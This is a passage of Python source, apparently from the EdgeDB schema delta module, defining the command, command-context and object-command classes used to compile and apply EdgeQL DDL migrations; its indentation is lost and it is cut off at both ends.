"""Sort an iterable of objects according to cross-references between them.
    Return a topological ordering of a graph of objects joined by references.
It is assumed that the graph has no cycles.
"""
graph = {}
for x in objs:
graph[x] = topological.DepGraphEntry(
item=x,
deps={ref for ref in schema.get_referrers(x)
if not x.is_parent_ref(schema, ref)},
extra=False,
)
return topological.sort(graph, allow_unresolved=True) # type: ignore
CommandMeta_T = TypeVar("CommandMeta_T", bound="CommandMeta")
class CommandMeta(
adapter.Adapter,
struct.MixedStructMeta,
):
_astnode_map: Dict[Type[qlast.DDLOperation], Type[Command]] = {}
def __new__(
mcls: Type[CommandMeta_T],
name: str,
bases: Tuple[type, ...],
dct: Dict[str, Any],
*,
context_class: Optional[Type[CommandContextToken[Command]]] = None,
**kwargs: Any,
) -> CommandMeta_T:
cls = super().__new__(mcls, name, bases, dct, **kwargs)
if context_class is not None:
cast(Command, cls)._context_class = context_class
return cls
def __init__(
cls,
name: str,
bases: Tuple[type, ...],
clsdict: Dict[str, Any],
*,
adapts: Optional[type] = None,
**kwargs: Any,
) -> None:
adapter.Adapter.__init__(cls, name, bases, clsdict, adapts=adapts)
struct.MixedStructMeta.__init__(cls, name, bases, clsdict)
astnodes = clsdict.get('astnode')
if astnodes and not isinstance(astnodes, (list, tuple)):
astnodes = [astnodes]
if astnodes:
cls.register_astnodes(astnodes)
def register_astnodes(
cls,
astnodes: Iterable[Type[qlast.DDLCommand]],
) -> None:
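        # Map each EdgeQL DDL AST node to this command class; the mapping is
        # consulted when DDL AST is compiled into commands, and duplicate
        # registrations are rejected.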
mapping = type(cls)._astnode_map
for astnode in astnodes:
existing = mapping.get(astnode)
if existing:
msg = ('duplicate EdgeQL AST node to command mapping: ' +
'{!r} is already declared for {!r}')
raise TypeError(msg.format(astnode, existing))
mapping[astnode] = cast(Type["Command"], cls)
# We use _dummy_object for contexts where an instance of an object is
# required by type signatures, and the actual reference will be quickly
# replaced by a real object.
_dummy_object = so.Object(
_private_id=uuid.UUID('C0FFEE00-C0DE-0000-0000-000000000000'),
)
Command_T = TypeVar("Command_T", bound="Command")
Command_T_co = TypeVar("Command_T_co", bound="Command", covariant=True)
class Command(
struct.MixedStruct,
markup.MarkupCapableMixin,
metaclass=CommandMeta,
):
source_context = struct.Field(parsing.ParserContext, default=None)
canonical = struct.Field(bool, default=False)
_context_class: Optional[Type[CommandContextToken[Command]]] = None
ops: List[Command]
before_ops: List[Command]
#: AlterObjectProperty lookup table for get|set_attribute_value
_attrs: Dict[str, AlterObjectProperty]
#: AlterSpecialObjectField lookup table
_special_attrs: Dict[str, AlterSpecialObjectField[so.Object]]
def __init__(self, **kwargs: Any) -> None:
super().__init__(**kwargs)
self.ops = []
self.before_ops = []
self.qlast: qlast.DDLOperation
self._attrs = {}
self._special_attrs = {}
def copy(self: Command_T) -> Command_T:
result = super().copy()
result.ops = [op.copy() for op in self.ops]
result.before_ops = [op.copy() for op in self.before_ops]
return result
def get_verb(self) -> str:
"""Return a verb representing this command in infinitive form."""
raise NotImplementedError
def get_friendly_description(
self,
*,
parent_op: Optional[Command] = None,
schema: Optional[s_schema.Schema] = None,
object: Any = None,
object_desc: Optional[str] = None,
) -> str:
"""Return a friendly description of this command in imperative mood.
The result is used in error messages and other user-facing renderings
of the command.
"""
raise NotImplementedError
@classmethod
def adapt(cls: Type[Command_T], obj: Command) -> Command_T:
result = obj.copy_with_class(cls)
mcls = cast(CommandMeta, type(cls))
for op in obj.get_prerequisites():
result.add_prerequisite(mcls.adapt(op))
for op in obj.get_subcommands(include_prerequisites=False):
result.add(mcls.adapt(op))
return result
def is_data_safe(self) -> bool:
return False
def get_required_user_input(self) -> Dict[str, str]:
return {}
def record_diff_annotations(
self,
schema: s_schema.Schema,
orig_schema: Optional[s_schema.Schema],
context: so.ComparisonContext,
) -> None:
"""Record extra information on a delta obtained by diffing schemas.
        This provides an opportunity for a delta command to annotate itself
        in schema diff scenarios (i.e. migrations).
Args:
schema:
Final schema of a migration.
orig_schema:
Original schema of a migration.
context:
Schema comparison context.
"""
pass
def resolve_obj_collection(
self,
value: Any,
schema: s_schema.Schema,
) -> Sequence[so.Object]:
sequence: Sequence[so.Object]
if isinstance(value, so.ObjectCollection):
sequence = value.objects(schema)
else:
sequence = []
for v in value:
if isinstance(v, so.Shell):
val = v.resolve(schema)
else:
val = v
sequence.append(val)
return sequence
def _resolve_attr_value(
self,
value: Any,
fname: str,
field: so.Field[Any],
schema: s_schema.Schema,
) -> Any:
ftype = field.type
if isinstance(value, so.Shell):
value = value.resolve(schema)
else:
if issubclass(ftype, so.ObjectDict):
if isinstance(value, so.ObjectDict):
items = dict(value.items(schema))
elif isinstance(value, collections.abc.Mapping):
items = {}
for k, v in value.items():
if isinstance(v, so.Shell):
val = v.resolve(schema)
else:
val = v
items[k] = val
value = ftype.create(schema, items)
elif issubclass(ftype, so.ObjectCollection):
sequence = self.resolve_obj_collection(value, schema)
value = ftype.create(schema, sequence)
elif issubclass(ftype, s_expr.Expression):
if value is not None:
value = ftype.from_expr(value, schema)
else:
value = field.coerce_value(schema, value)
return value
def enumerate_attributes(self) -> Tuple[str, ...]:
return tuple(self._attrs)
def _enumerate_attribute_cmds(self) -> Tuple[AlterObjectProperty, ...]:
return tuple(self._attrs.values())
def has_attribute_value(self, attr_name: str) -> bool:
return attr_name in self._attrs or attr_name in self._special_attrs
def _get_simple_attribute_set_cmd(
self,
attr_name: str,
) -> Optional[AlterObjectProperty]:
return self._attrs.get(attr_name)
def _get_attribute_set_cmd(
self,
attr_name: str,
) -> Optional[AlterObjectProperty]:
cmd = self._get_simple_attribute_set_cmd(attr_name)
if cmd is None:
special_cmd = self._special_attrs.get(attr_name)
if special_cmd is not None:
cmd = special_cmd._get_attribute_set_cmd(attr_name)
return cmd
def get_attribute_value(
self,
attr_name: str,
) -> Any:
op = self._get_attribute_set_cmd(attr_name)
if op is not None:
return op.new_value
else:
return None
def get_local_attribute_value(
self,
attr_name: str,
) -> Any:
"""Return the new value of field, if not inherited."""
op = self._get_attribute_set_cmd(attr_name)
if op is not None and not op.new_inherited:
return op.new_value
else:
return None
def get_orig_attribute_value(
self,
attr_name: str,
) -> Any:
op = self._get_attribute_set_cmd(attr_name)
if op is not None:
return op.old_value
else:
return None
def is_attribute_inherited(
self,
attr_name: str,
) -> bool:
op = self._get_attribute_set_cmd(attr_name)
if op is not None:
return op.new_inherited
else:
return False
def is_attribute_computed(
self,
attr_name: str,
) -> bool:
op = self._get_attribute_set_cmd(attr_name)
if op is not None:
return op.new_computed
else:
return False
def get_attribute_source_context(
self,
attr_name: str,
) -> Optional[parsing.ParserContext]:
op = self._get_attribute_set_cmd(attr_name)
if op is not None:
return op.source_context
else:
return None
def set_attribute_value(
self,
attr_name: str,
value: Any,
*,
orig_value: Any = None,
inherited: bool = False,
orig_inherited: Optional[bool] = None,
computed: bool = False,
from_default: bool = False,
orig_computed: Optional[bool] = None,
source_context: Optional[parsing.ParserContext] = None,
) -> Command:
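        # Reuse the existing AlterObjectProperty for this field if present;
        # otherwise create one and register it as a subcommand.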
orig_op = op = self._get_simple_attribute_set_cmd(attr_name)
if op is None:
op = AlterObjectProperty(property=attr_name, new_value=value)
else:
op.new_value = value
if orig_inherited is None:
orig_inherited = inherited
op.new_inherited = inherited
op.old_inherited = orig_inherited
if orig_computed is None:
orig_computed = computed
op.new_computed = computed
op.old_computed = orig_computed
op.from_default = from_default
if source_context is not None:
op.source_context = source_context
if orig_value is not None:
op.old_value = orig_value
if orig_op is None:
self.add(op)
return op
def discard_attribute(self, attr_name: str) -> None:
op = self._get_attribute_set_cmd(attr_name)
if op is not None:
self.discard(op)
def __iter__(self) -> NoReturn:
raise TypeError(f'{type(self)} object is not iterable')
@overload
def get_subcommands(
self,
*,
type: Type[Command_T],
metaclass: Optional[Type[so.Object]] = None,
exclude: Union[Type[Command], Tuple[Type[Command], ...], None] = None,
include_prerequisites: bool = True,
) -> Tuple[Command_T, ...]:
...
@overload
def get_subcommands( # NoQA: F811
self,
*,
type: None = None,
metaclass: Optional[Type[so.Object]] = None,
exclude: Union[Type[Command], Tuple[Type[Command], ...], None] = None,
include_prerequisites: bool = True,
) -> Tuple[Command, ...]:
...
def get_subcommands( # NoQA: F811
self,
*,
type: Union[Type[Command_T], None] = None,
metaclass: Optional[Type[so.Object]] = None,
exclude: Union[Type[Command], Tuple[Type[Command], ...], None] = None,
include_prerequisites: bool = True,
) -> Tuple[Command, ...]:
ops: Iterable[Command]
if include_prerequisites:
ops = itertools.chain(self.before_ops, self.ops)
else:
ops = self.ops
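        # Compose the requested filters (command type, exclusions, schema
        # metaclass) and apply them in a single pass over the subcommands.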
filters = []
if type is not None:
t = type
filters.append(lambda i: isinstance(i, t))
if exclude is not None:
ex = exclude
filters.append(lambda i: not isinstance(i, ex))
if metaclass is not None:
mcls = metaclass
filters.append(
lambda i: (
isinstance(i, ObjectCommand)
and issubclass(i.get_schema_metaclass(), mcls)
)
)
if filters:
return tuple(filter(lambda i: all(f(i) for f in filters), ops))
else:
return tuple(ops)
@overload
def get_prerequisites(
self,
*,
type: Type[Command_T],
include_prerequisites: bool = True,
) -> Tuple[Command_T, ...]:
...
@overload
def get_prerequisites( # NoQA: F811
self,
*,
type: None = None,
) -> Tuple[Command, ...]:
...
def get_prerequisites( # NoQA: F811
self,
*,
type: Union[Type[Command_T], None] = None,
include_prerequisites: bool = True,
) -> Tuple[Command, ...]:
if type is not None:
t = type
return tuple(filter(lambda i: isinstance(i, t), self.before_ops))
else:
return tuple(self.before_ops)
def has_subcommands(self) -> bool:
return bool(self.ops) or bool(self.before_ops)
def get_nonattr_subcommand_count(self) -> int:
count = 0
attr_cmds = (AlterObjectProperty, AlterSpecialObjectField)
for op in self.ops:
if not isinstance(op, attr_cmds):
count += 1
for op in self.before_ops:
if not isinstance(op, attr_cmds):
count += 1
return count
def prepend_prerequisite(self, command: Command) -> None:
if isinstance(command, CommandGroup):
for op in reversed(command.get_subcommands()):
self.prepend_prerequisite(op)
else:
self.before_ops.insert(0, command)
def add_prerequisite(self, command: Command) -> None:
if isinstance(command, CommandGroup):
self.before_ops.extend(command.get_subcommands())
else:
self.before_ops.append(command)
def prepend(self, command: Command) -> None:
if isinstance(command, CommandGroup):
for op in reversed(command.get_subcommands()):
self.prepend(op)
else:
if isinstance(command, AlterObjectProperty):
self._attrs[command.property] = command
elif isinstance(command, AlterSpecialObjectField):
self._special_attrs[command._field] = command
self.ops.insert(0, command)
def add(self, command: Command) -> None:
if isinstance(command, CommandGroup):
self.update(command.get_subcommands())
else:
if isinstance(command, AlterObjectProperty):
self._attrs[command.property] = command
elif isinstance(command, AlterSpecialObjectField):
self._special_attrs[command._field] = command
self.ops.append(command)
def update(self, commands: Iterable[Command]) -> None: # type: ignore
for command in commands:
self.add(command)
def replace(self, existing: Command, new: Command) -> None: # type: ignore
i = self.ops.index(existing)
self.ops[i] = new
def replace_all(self, commands: Iterable[Command]) -> None:
self.ops.clear()
self._attrs.clear()
self._special_attrs.clear()
self.update(commands)
def discard(self, command: Command) -> None:
try:
self.ops.remove(command)
except ValueError:
pass
try:
self.before_ops.remove(command)
except ValueError:
pass
if isinstance(command, AlterObjectProperty):
self._attrs.pop(command.property)
elif isinstance(command, AlterSpecialObjectField):
self._special_attrs.pop(command._field)
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
return schema
def get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
context_class = type(self).get_context_class()
assert context_class is not None
with context(context_class(schema=schema, op=self)):
return self._get_ast(schema, context, parent_node=parent_node)
def _get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
raise NotImplementedError
def _log_all_renames(self, context: CommandContext) -> None:
if isinstance(self, RenameObject):
context.early_renames[self.classname] = self.new_name
for subcmd in self.get_subcommands():
subcmd._log_all_renames(context)
@classmethod
def get_orig_expr_text(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
name: str,
) -> Optional[str]:
orig_text_expr = qlast.get_ddl_field_value(astnode, f'orig_{name}')
if orig_text_expr:
orig_text = qlcompiler.evaluate_ast_to_python_val(
orig_text_expr, schema=schema)
else:
orig_text = None
return orig_text # type: ignore
@classmethod
def command_for_ast_node(
cls,
astnode: qlast.DDLOperation,
schema: s_schema.Schema,
context: CommandContext,
) -> Type[Command]:
return cls
@classmethod
def _modaliases_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Dict[Optional[str], str]:
modaliases = {}
if isinstance(astnode, qlast.DDLCommand) and astnode.aliases:
for alias in astnode.aliases:
if isinstance(alias, qlast.ModuleAliasDecl):
modaliases[alias.alias] = alias.module
return modaliases
@classmethod
def localnames_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Set[str]:
localnames: Set[str] = set()
if isinstance(astnode, qlast.DDLCommand) and astnode.aliases:
for alias in astnode.aliases:
if isinstance(alias, qlast.AliasedExpr):
localnames.add(alias.alias)
return localnames
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Command:
cmd = cls._cmd_from_ast(schema, astnode, context)
cmd.source_context = astnode.context
cmd.qlast = astnode
ctx = context.current()
if ctx is not None and type(ctx) is cls.get_context_class():
ctx.op = cmd
if astnode.commands:
for subastnode in astnode.commands:
subcmd = compile_ddl(schema, subastnode, context=context)
if subcmd is not None:
cmd.add(subcmd)
return cmd
@classmethod
def _cmd_from_ast(
cls: Type[Command_T],
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Command:
return cls()
@classmethod
def as_markup(cls, self: Command, *, ctx: markup.Context) -> markup.Markup:
node = markup.elements.lang.TreeNode(name=str(self))
for dd in self.get_subcommands():
if isinstance(dd, AlterObjectProperty):
diff = markup.elements.doc.ValueDiff(
before=repr(dd.old_value), after=repr(dd.new_value))
if dd.new_inherited:
diff.comment = 'inherited'
elif dd.new_computed:
diff.comment = 'computed'
node.add_child(label=dd.property, node=diff)
else:
node.add_child(node=markup.serialize(dd, ctx=ctx))
return node
@classmethod
def get_context_class(
cls: Type[Command_T],
) -> Optional[Type[CommandContextToken[Command_T]]]:
return cls._context_class # type: ignore
@classmethod
def get_context_class_or_die(
cls: Type[Command_T],
) -> Type[CommandContextToken[Command_T]]:
ctxcls = cls.get_context_class()
if ctxcls is None:
raise RuntimeError(f'context class not defined for {cls}')
return ctxcls
def formatfields(
self,
formatter: str = 'str',
) -> Iterator[Tuple[str, str]]:
"""Return an iterator over fields formatted using `formatter`."""
for name, field in self.__class__._fields.items():
value = getattr(self, name)
default = field.default
formatter_obj = field.formatters.get(formatter)
if formatter_obj and value != default:
yield (name, formatter_obj(value))
class Nop(Command):
pass
# Similarly to _dummy_object, we use _dummy_command for places where
# the typing requires an object, but we don't have it just yet.
_dummy_command = Command()
CommandList = checked.CheckedList[Command]
class CommandGroup(Command):
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
for op in self.get_subcommands():
schema = op.apply(schema, context)
return schema
class CommandContextToken(Generic[Command_T]):
original_schema: s_schema.Schema
op: Command_T
modaliases: Mapping[Optional[str], str]
localnames: AbstractSet[str]
inheritance_merge: Optional[bool]
inheritance_refdicts: Optional[AbstractSet[str]]
mark_derived: Optional[bool]
preserve_path_id: Optional[bool]
enable_recursion: Optional[bool]
transient_derivation: Optional[bool]
def __init__(
self,
schema: s_schema.Schema,
op: Command_T,
*,
modaliases: Optional[Mapping[Optional[str], str]] = None,
# localnames are the names defined locally via with block or
# as function parameters and should not be fully-qualified
localnames: AbstractSet[str] = frozenset(),
) -> None:
self.original_schema = schema
self.op = op
self.modaliases = modaliases if modaliases is not None else {}
self.localnames = localnames
self.inheritance_merge = None
self.inheritance_refdicts = None
self.mark_derived = None
self.preserve_path_id = None
self.enable_recursion = None
self.transient_derivation = None
class CommandContextWrapper(Generic[Command_T_co]):
def __init__(
self,
context: CommandContext,
token: CommandContextToken[Command_T_co],
) -> None:
self.context = context
self.token = token
def __enter__(self) -> CommandContextToken[Command_T_co]:
self.context.push(self.token) # type: ignore
return self.token
def __exit__(
self,
exc_type: Type[Exception],
exc_value: Exception,
traceback: Any,
) -> None:
self.context.pop()
class CommandContext:
def __init__(
self,
*,
schema: Optional[s_schema.Schema] = None,
modaliases: Optional[Mapping[Optional[str], str]] = None,
localnames: AbstractSet[str] = frozenset(),
declarative: bool = False,
stdmode: bool = False,
testmode: bool = False,
internal_schema_mode: bool = False,
disable_dep_verification: bool = False,
allow_dml_in_functions: bool = False,
descriptive_mode: bool = False,
schema_object_ids: Optional[
Mapping[Tuple[sn.Name, Optional[str]], uuid.UUID]
] = None,
backend_runtime_params: Optional[Any] = None,
compat_ver: Optional[verutils.Version] = None,
) -> None:
self.stack: List[CommandContextToken[Command]] = []
self._cache: Dict[Hashable, Any] = {}
self._values: Dict[Hashable, Any] = {}
self.declarative = declarative
self.schema = schema
self._modaliases = modaliases if modaliases is not None else {}
self._localnames = localnames
self.stdmode = stdmode
self.internal_schema_mode = internal_schema_mode
self.testmode = testmode
self.descriptive_mode = descriptive_mode
self.disable_dep_verification = disable_dep_verification
self.allow_dml_in_functions = allow_dml_in_functions
self.renames: Dict[sn.Name, sn.Name] = {}
self.early_renames: Dict[sn.Name, sn.Name] = {}
self.renamed_objs: Set[so.Object] = set()
self.change_log: Dict[Tuple[Type[so.Object], str], Set[so.Object]] = (
collections.defaultdict(set))
self.schema_object_ids = schema_object_ids
self.backend_runtime_params = backend_runtime_params
self.affected_finalization: Dict[
Command,
List[Tuple[Command, AlterObject[so.Object], List[str]]],
] = collections.defaultdict(list)
self.compat_ver = compat_ver
@property
def modaliases(self) -> Mapping[Optional[str], str]:
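        # Module aliases from inner context tokens shadow those from outer
        # tokens; the context-wide defaults are consulted last.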
maps = [t.modaliases for t in reversed(self.stack)]
maps.append(self._modaliases)
return collections.ChainMap(*maps)
@property
def localnames(self) -> Set[str]:
ign: Set[str] = set()
for ctx in reversed(self.stack):
ign.update(ctx.localnames)
ign.update(self._localnames)
return ign
@property
def inheritance_merge(self) -> Optional[bool]:
for ctx in reversed(self.stack):
if ctx.inheritance_merge is not None:
return ctx.inheritance_merge
return None
@property
def mark_derived(self) -> Optional[bool]:
for ctx in reversed(self.stack):
if ctx.mark_derived is not None:
return ctx.mark_derived
return None
@property
def preserve_path_id(self) -> Optional[bool]:
for ctx in reversed(self.stack):
if ctx.preserve_path_id is not None:
return ctx.preserve_path_id
return None
@property
def inheritance_refdicts(self) -> Optional[AbstractSet[str]]:
for ctx in reversed(self.stack):
if ctx.inheritance_refdicts is not None:
return ctx.inheritance_refdicts
return None
@property
def enable_recursion(self) -> bool:
for ctx in reversed(self.stack):
if ctx.enable_recursion is not None:
return ctx.enable_recursion
return True
@property
def transient_derivation(self) -> bool:
for ctx in reversed(self.stack):
if ctx.transient_derivation is not None:
return ctx.transient_derivation
return False
@property
def canonical(self) -> bool:
return any(ctx.op.canonical for ctx in self.stack)
def in_deletion(self, offset: int = 0) -> bool:
"""Return True if any object is being deleted in this context.
:param offset:
The offset in the context stack to start looking at.
:returns:
True if any object is being deleted in this context starting
from *offset* in the stack.
"""
return any(isinstance(ctx.op, DeleteObject)
for ctx in self.stack[:-offset])
def is_deleting(self, obj: so.Object) -> bool:
"""Return True if *obj* is being deleted in this context.
:param obj:
The object in question.
:returns:
True if *obj* is being deleted in this context.
"""
return any(isinstance(ctx.op, DeleteObject)
and ctx.op.scls == obj for ctx in self.stack)
def push(self, token: CommandContextToken[Command]) -> None:
self.stack.append(token)
def pop(self) -> CommandContextToken[Command]:
return self.stack.pop()
def get_referrer_name(
self, referrer_ctx: CommandContextToken[ObjectCommand[so.Object]],
) -> sn.QualName:
referrer_name = referrer_ctx.op.classname
renamed = self.early_renames.get(referrer_name)
if renamed:
referrer_name = renamed
else:
renamed = self.renames.get(referrer_name)
if renamed:
referrer_name = renamed
assert isinstance(referrer_name, sn.QualName)
return referrer_name
def get(
self,
cls: Union[Type[Command], Type[CommandContextToken[Command]]],
) -> Optional[CommandContextToken[Command]]:
if issubclass(cls, Command):
ctxcls = cls.get_context_class()
assert ctxcls is not None
else:
ctxcls = cls
for item in reversed(self.stack):
if isinstance(item, ctxcls):
return item
return None
def get_ancestor(
self,
cls: Union[Type[Command], Type[CommandContextToken[Command]]],
op: Optional[Command] = None,
) -> Optional[CommandContextToken[Command]]:
if issubclass(cls, Command):
ctxcls = cls.get_context_class()
assert ctxcls is not None
else:
ctxcls = cls
if op is not None:
for item in list(reversed(self.stack)):
if isinstance(item, ctxcls) and item.op is not op:
return item
else:
for item in list(reversed(self.stack))[1:]:
if isinstance(item, ctxcls):
return item
return None
def top(self) -> CommandContextToken[Command]:
if self.stack:
return self.stack[0]
else:
raise KeyError('command context stack is empty')
def current(self) -> CommandContextToken[Command]:
if self.stack:
return self.stack[-1]
else:
raise KeyError('command context stack is empty')
def parent(self) -> Optional[CommandContextToken[Command]]:
if len(self.stack) > 1:
return self.stack[-2]
else:
return None
def copy(self) -> CommandContext:
ctx = CommandContext()
ctx.stack = self.stack[:]
return ctx
def at_top(self) -> CommandContext:
ctx = CommandContext()
        ctx.stack = self.stack[:1]
return ctx
def cache_value(self, key: Hashable, value: Any) -> None:
self._cache[key] = value
def get_cached(self, key: Hashable) -> Any:
return self._cache.get(key)
def drop_cache(self, key: Hashable) -> None:
self._cache.pop(key, None)
def store_value(self, key: Hashable, value: Any) -> None:
self._values[key] = value
def get_value(self, key: Hashable) -> Any:
return self._values.get(key)
@contextlib.contextmanager
def suspend_dep_verification(self) -> Iterator[CommandContext]:
dep_ver = self.disable_dep_verification
self.disable_dep_verification = True
try:
yield self
finally:
self.disable_dep_verification = dep_ver
def __call__(
self,
token: CommandContextToken[Command_T],
) -> CommandContextWrapper[Command_T]:
return CommandContextWrapper(self, token)
def compat_ver_is_before(
self,
ver: Tuple[int, int, verutils.VersionStage, int],
) -> bool:
return self.compat_ver is not None and self.compat_ver < ver
class ContextStack:
def __init__(
self,
contexts: Iterable[CommandContextWrapper[Command]],
) -> None:
self._contexts = list(contexts)
def push(self, ctx: CommandContextWrapper[Command]) -> None:
self._contexts.append(ctx)
def pop(self) -> None:
self._contexts.pop()
@contextlib.contextmanager
def __call__(self) -> Generator[None, None, None]:
with contextlib.ExitStack() as stack:
for ctx in self._contexts:
stack.enter_context(ctx) # type: ignore
yield
class DeltaRootContext(CommandContextToken["DeltaRoot"]):
pass
class DeltaRoot(CommandGroup, context_class=DeltaRootContext):
def __init__(self, **kwargs: Any) -> None:
super().__init__(**kwargs)
self.new_types: Set[uuid.UUID] = set()
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
from . import modules
from . import types as s_types
context = context or CommandContext()
with context(DeltaRootContext(schema=schema, op=self)):
mods = []
for cmop in self.get_subcommands(type=modules.CreateModule):
schema = cmop.apply(schema, context)
mods.append(cmop.scls)
for amop in self.get_subcommands(type=modules.AlterModule):
schema = amop.apply(schema, context)
mods.append(amop.scls)
for objop in self.get_subcommands():
if not isinstance(objop, (modules.CreateModule,
modules.AlterModule,
s_types.DeleteCollectionType)):
schema = objop.apply(schema, context)
for cop in self.get_subcommands(type=s_types.DeleteCollectionType):
schema = cop.apply(schema, context)
return schema
class Query(Command):
"""A special delta command representing a non-DDL query.
These are found in migrations.
"""
astnode = qlast.Query
expr = struct.Field(s_expr.Expression)
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Command:
return cls(
source_context=astnode.context,
expr=s_expr.Expression.from_ast(
astnode, # type: ignore
schema=schema,
modaliases=context.modaliases,
localnames=context.localnames,
),
)
@classmethod
def as_markup(cls, self: Command, *, ctx: markup.Context) -> markup.Markup:
node = super().as_markup(self, ctx=ctx)
assert isinstance(node, markup.elements.lang.TreeNode)
assert isinstance(self, Query)
qltext = self.expr.text
node.add_child(node=markup.elements.lang.MultilineString(str=qltext))
return node
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
schema = super().apply(schema, context)
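        # Compile the query expression lazily, using the module aliases in
        # effect for this command context.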
if not self.expr.is_compiled():
self.expr = self.expr.compiled(
self.expr,
schema,
options=qlcompiler.CompilerOptions(
modaliases=context.modaliases,
)
)
return schema
_command_registry: Dict[
Tuple[str, Type[so.Object]],
Type[ObjectCommand[so.Object]]
] = {}
def get_object_command_class(
cmdtype: Type[Command_T],
schema_metaclass: Type[so.Object],
) -> Optional[Type[Command_T]]:
assert issubclass(cmdtype, ObjectCommand)
return _command_registry.get( # type: ignore
(cmdtype._delta_action, schema_metaclass),
)
def get_object_command_class_or_die(
cmdtype: Type[Command_T],
schema_metaclass: Type[so.Object],
) -> Type[Command_T]:
cmdcls = get_object_command_class(cmdtype, schema_metaclass)
if cmdcls is None:
raise TypeError(f'missing {cmdtype.__name__} implementation '
f'for {schema_metaclass.__name__}')
return cmdcls
ObjectCommand_T = TypeVar("ObjectCommand_T", bound='ObjectCommand[so.Object]')
class ObjectCommand(Command, Generic[so.Object_T]):
"""Base class for all Object-related commands."""
#: Full name of the object this command operates on.
classname = struct.Field(sn.Name)
    #: An optional set of values necessary to render the command in DDL.
ddl_identity = struct.Field(
dict, # type: ignore
default=None,
)
#: An optional dict of metadata annotations for this command.
annotations = struct.Field(
dict, # type: ignore
default=None,
)
#: Auxiliary object information that might be necessary to process
#: this command, derived from object fields.
aux_object_data = struct.Field(
dict, # type: ignore
default=None,
)
#: When this command is produced by a breakup of a larger command
#: subtree, *orig_cmd_type* would contain the type of the original
#: command.
orig_cmd_type = struct.Field(
CommandMeta,
default=None,
)
scls: so.Object_T
_delta_action: ClassVar[str]
_schema_metaclass: ClassVar[Optional[Type[so.Object_T]]] = None
astnode: ClassVar[Union[Type[qlast.DDLOperation],
List[Type[qlast.DDLOperation]]]]
def __init_subclass__(cls, *args: Any, **kwargs: Any) -> None:
# Check if the command subclass has been parametrized with
# a concrete schema object class, and if so, record the
# argument to be made available via get_schema_metaclass().
super().__init_subclass__(*args, **kwargs)
generic_bases = typing_inspect.get_generic_bases(cls)
mcls: Optional[Type[so.Object]] = None
for gb in generic_bases:
base_origin = typing_inspect.get_origin(gb)
# Find the <ObjectCommand>[Type] base, where ObjectCommand
# is any ObjectCommand subclass.
if (
base_origin is not None
and issubclass(base_origin, ObjectCommand)
):
args = typing_inspect.get_args(gb)
if len(args) != 1:
raise AssertionError(
'expected only one argument to ObjectCommand generic')
arg_0 = args[0]
if not typing_inspect.is_typevar(arg_0):
assert issubclass(arg_0, so.Object)
if not arg_0.is_abstract():
mcls = arg_0
break
if mcls is not None:
existing = getattr(cls, '_schema_metaclass', None)
if existing is not None and existing is not mcls:
raise TypeError(
f'cannot redefine schema class of {cls.__name__} to '
f'{mcls.__name__}: a superclass has already defined it as '
f'{existing.__name__}'
)
cls._schema_metaclass = mcls
# If this is a command adapter rather than the actual
# command, skip the command class registration.
if not cls.has_adaptee():
delta_action = getattr(cls, '_delta_action', None)
schema_metaclass = getattr(cls, '_schema_metaclass', None)
if schema_metaclass is not None and delta_action is not None:
key = delta_action, schema_metaclass
cmdcls = _command_registry.get(key)
if cmdcls is not None:
raise TypeError(
f'Action {cls._delta_action!r} for '
f'{schema_metaclass} is already claimed by {cmdcls}'
)
_command_registry[key] = cls # type: ignore
@classmethod
def _classname_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
context: CommandContext,
) -> sn.Name:
return sn.UnqualName(astnode.name.name)
@classmethod
def _cmd_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> ObjectCommand[so.Object_T]:
assert isinstance(astnode, qlast.ObjectDDL), 'expected ObjectDDL'
classname = cls._classname_from_ast(schema, astnode, context)
return cls(classname=classname)
def is_data_safe(self) -> bool:
if self.get_schema_metaclass()._data_safe:
return True
else:
return all(
subcmd.is_data_safe()
for subcmd in self.get_subcommands()
)
def get_required_user_input(self) -> Dict[str, str]:
result: Dict[str, str] = self.get_annotation('required_input')
if result is None:
result = {}
for cmd in self.get_subcommands():
subresult = cmd.get_required_user_input()
if subresult:
result.update(subresult)
return result
def get_friendly_description(
self,
*,
parent_op: Optional[Command] = None,
schema: Optional[s_schema.Schema] = None,
object: Any = None,
object_desc: Optional[str] = None,
) -> str:
"""Return a friendly description of this command in imperative mood.
The result is used in error messages and other user-facing renderings
of the command.
"""
object_desc = self.get_friendly_object_name_for_description(
parent_op=parent_op,
schema=schema,
object=object,
object_desc=object_desc,
)
return f'{self.get_verb()} {object_desc}'
def get_user_prompt(
self,
*,
parent_op: Optional[Command] = None,
) -> Tuple[str, str]:
"""Return a human-friendly prompt describing this operation."""
# The prompt is determined by the *innermost* subcommand as
# long as all its parents have exactly one child. The tree
# traversal stops on fragments and CreateObject commands,
        # since there is no point in prompting about the creation of
# object innards.
if (
not isinstance(self, AlterObjectFragment)
and (
not isinstance(self, CreateObject)
and (
self.orig_cmd_type is None
or not issubclass(
self.orig_cmd_type, CreateObject
)
)
)
):
from . import referencing as s_referencing
subcommands = self.get_subcommands(
type=ObjectCommand,
exclude=(AlterObjectProperty, s_referencing.AlterOwned),
)
if len(subcommands) == 1:
subcommand = subcommands[0]
if isinstance(subcommand, AlterObjectFragment):
return subcommand.get_user_prompt(parent_op=parent_op)
else:
return subcommand.get_user_prompt(parent_op=self)
desc = self.get_friendly_description(parent_op=parent_op)
